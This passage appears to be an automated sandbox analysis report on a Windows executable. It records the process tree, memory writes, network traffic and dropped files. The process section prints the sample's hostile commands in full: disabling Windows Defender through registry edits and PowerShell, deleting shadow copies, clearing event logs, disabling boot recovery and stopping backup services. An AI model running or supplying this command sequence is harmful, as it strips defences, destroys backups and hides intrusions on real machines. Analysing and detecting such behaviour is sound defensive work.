Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3112 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3112 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 1344 wrote to memory of 3032 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1344 wrote to memory of 3032 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3112 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3112 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 424 wrote to memory of 1524 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 424 wrote to memory of 1524 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3112 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3112 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 2196 wrote to memory of 3572 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2196 wrote to memory of 3572 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3112 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3112 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3052 wrote to memory of 4064 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3052 wrote to memory of 4064 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3112 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3112 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3048 wrote to memory of 1008 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3048 wrote to memory of 1008 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3112 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3112 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3240 wrote to memory of 2748 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3240 wrote to memory of 2748 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3112 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3112 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 1308 wrote to memory of 1160 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1160 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3112 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3112 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 716 wrote to memory of 720 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 716 wrote to memory of 720 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3112 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3112 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 1788 wrote to memory of 2200 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1788 wrote to memory of 2200 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3112 wrote to memory of 596 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 596 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe
PID 3112 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe
PID 3112 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe
PID 3112 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe
PID 3112 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe
PID 3112 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe
PID 3112 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe
PID 3112 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe
PID 3112 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe
PID 3112 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe

"C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_12a0b" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_12a0b" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_12a0b" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 52.109.8.19:443 tcp
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

memory/1344-118-0x0000000000000000-mapping.dmp

memory/3032-119-0x0000000000000000-mapping.dmp

memory/424-120-0x0000000000000000-mapping.dmp

memory/1524-121-0x0000000000000000-mapping.dmp

memory/2196-122-0x0000000000000000-mapping.dmp

memory/3572-123-0x0000000000000000-mapping.dmp

memory/3052-124-0x0000000000000000-mapping.dmp

memory/4064-125-0x0000000000000000-mapping.dmp

memory/3048-126-0x0000000000000000-mapping.dmp

memory/1008-127-0x0000000000000000-mapping.dmp

memory/3240-128-0x0000000000000000-mapping.dmp

memory/2748-129-0x0000000000000000-mapping.dmp

memory/1308-130-0x0000000000000000-mapping.dmp

memory/1160-131-0x0000000000000000-mapping.dmp

memory/716-132-0x0000000000000000-mapping.dmp

memory/720-133-0x0000000000000000-mapping.dmp

memory/1788-134-0x0000000000000000-mapping.dmp

memory/2200-135-0x0000000000000000-mapping.dmp

memory/596-136-0x0000000000000000-mapping.dmp

memory/964-137-0x0000000000000000-mapping.dmp

memory/1156-138-0x0000000000000000-mapping.dmp

memory/1468-139-0x0000000000000000-mapping.dmp

memory/2388-140-0x0000000000000000-mapping.dmp

memory/1968-141-0x0000000000000000-mapping.dmp

memory/1944-142-0x0000000000000000-mapping.dmp

memory/2440-143-0x0000000000000000-mapping.dmp

memory/1868-144-0x0000000000000000-mapping.dmp

memory/2404-145-0x0000000000000000-mapping.dmp

memory/3656-146-0x0000000000000000-mapping.dmp

memory/1052-147-0x0000000000000000-mapping.dmp

memory/3368-148-0x0000000000000000-mapping.dmp

memory/3152-149-0x0000000000000000-mapping.dmp

memory/3748-150-0x0000000000000000-mapping.dmp

memory/2004-151-0x0000000000000000-mapping.dmp

memory/696-152-0x0000000000000000-mapping.dmp

memory/3772-153-0x0000000000000000-mapping.dmp

memory/500-154-0x0000000000000000-mapping.dmp

memory/652-155-0x0000000000000000-mapping.dmp

memory/1000-156-0x0000000000000000-mapping.dmp

memory/60-157-0x0000000000000000-mapping.dmp

memory/3280-158-0x0000000000000000-mapping.dmp

memory/2216-159-0x0000000000000000-mapping.dmp

memory/3384-160-0x0000000000000000-mapping.dmp

memory/2752-161-0x0000000000000000-mapping.dmp

memory/604-162-0x0000000000000000-mapping.dmp

memory/1356-163-0x0000000000000000-mapping.dmp

memory/1036-164-0x0000000000000000-mapping.dmp

memory/3940-165-0x0000000000000000-mapping.dmp

memory/2508-166-0x0000000000000000-mapping.dmp

memory/1316-167-0x0000000000000000-mapping.dmp

memory/1448-168-0x0000000000000000-mapping.dmp

memory/1672-169-0x0000000000000000-mapping.dmp

memory/2232-170-0x0000000000000000-mapping.dmp

memory/3224-171-0x0000000000000000-mapping.dmp

memory/2860-172-0x0000000000000000-mapping.dmp

memory/1776-173-0x0000000000000000-mapping.dmp

memory/2760-174-0x0000000000000000-mapping.dmp

memory/3744-175-0x0000000000000000-mapping.dmp

memory/3172-176-0x0000000000000000-mapping.dmp

memory/868-177-0x0000000000000000-mapping.dmp

memory/3788-178-0x0000000000000000-mapping.dmp

memory/3064-179-0x0000000000000000-mapping.dmp

memory/1960-180-0x0000000000000000-mapping.dmp

memory/4028-181-0x0000000000000000-mapping.dmp

memory/1780-182-0x000001D104850000-0x000001D104852000-memory.dmp

memory/1780-183-0x000001D104850000-0x000001D104852000-memory.dmp

memory/1780-184-0x000001D104850000-0x000001D104852000-memory.dmp

memory/1780-185-0x000001D104850000-0x000001D104852000-memory.dmp

memory/1780-186-0x000001D11CFD0000-0x000001D11CFF2000-memory.dmp

memory/1780-187-0x000001D104850000-0x000001D104852000-memory.dmp

memory/1780-188-0x000001D104850000-0x000001D104852000-memory.dmp

memory/1780-189-0x000001D11D180000-0x000001D11D1F6000-memory.dmp

memory/1780-190-0x000001D104850000-0x000001D104852000-memory.dmp

memory/1780-194-0x000001D104870000-0x000001D104872000-memory.dmp

memory/1780-195-0x000001D104873000-0x000001D104875000-memory.dmp

memory/1780-196-0x000001D104876000-0x000001D104878000-memory.dmp

memory/1780-217-0x000001D104850000-0x000001D104852000-memory.dmp

memory/700-219-0x0000017BD4260000-0x0000017BD4262000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

memory/700-220-0x0000017BD4260000-0x0000017BD4262000-memory.dmp

memory/700-221-0x0000017BD4260000-0x0000017BD4262000-memory.dmp

memory/700-222-0x0000017BD4260000-0x0000017BD4262000-memory.dmp

memory/700-223-0x0000017BD5B10000-0x0000017BD5B32000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fe58cf0a724a75cd8b670b1a45ff3373
SHA1 f7399d078a2f6e9681ab009d95bf7951d89e2058
SHA256 232835ad6008f18ceff265489e29fc3d15edd76fa4254f0e6fec96f3ddb5c245
SHA512 193fcc18f42a1750290877da4529f4b76f91eda19063650b3d62a3716e09f9b69b391be429b853847bdfa872f3fd9d9ab6ef340e911f492c271531bf09da4dea

memory/700-225-0x0000017BD4260000-0x0000017BD4262000-memory.dmp

memory/700-226-0x0000017BD4260000-0x0000017BD4262000-memory.dmp

memory/700-227-0x0000017BEE320000-0x0000017BEE396000-memory.dmp

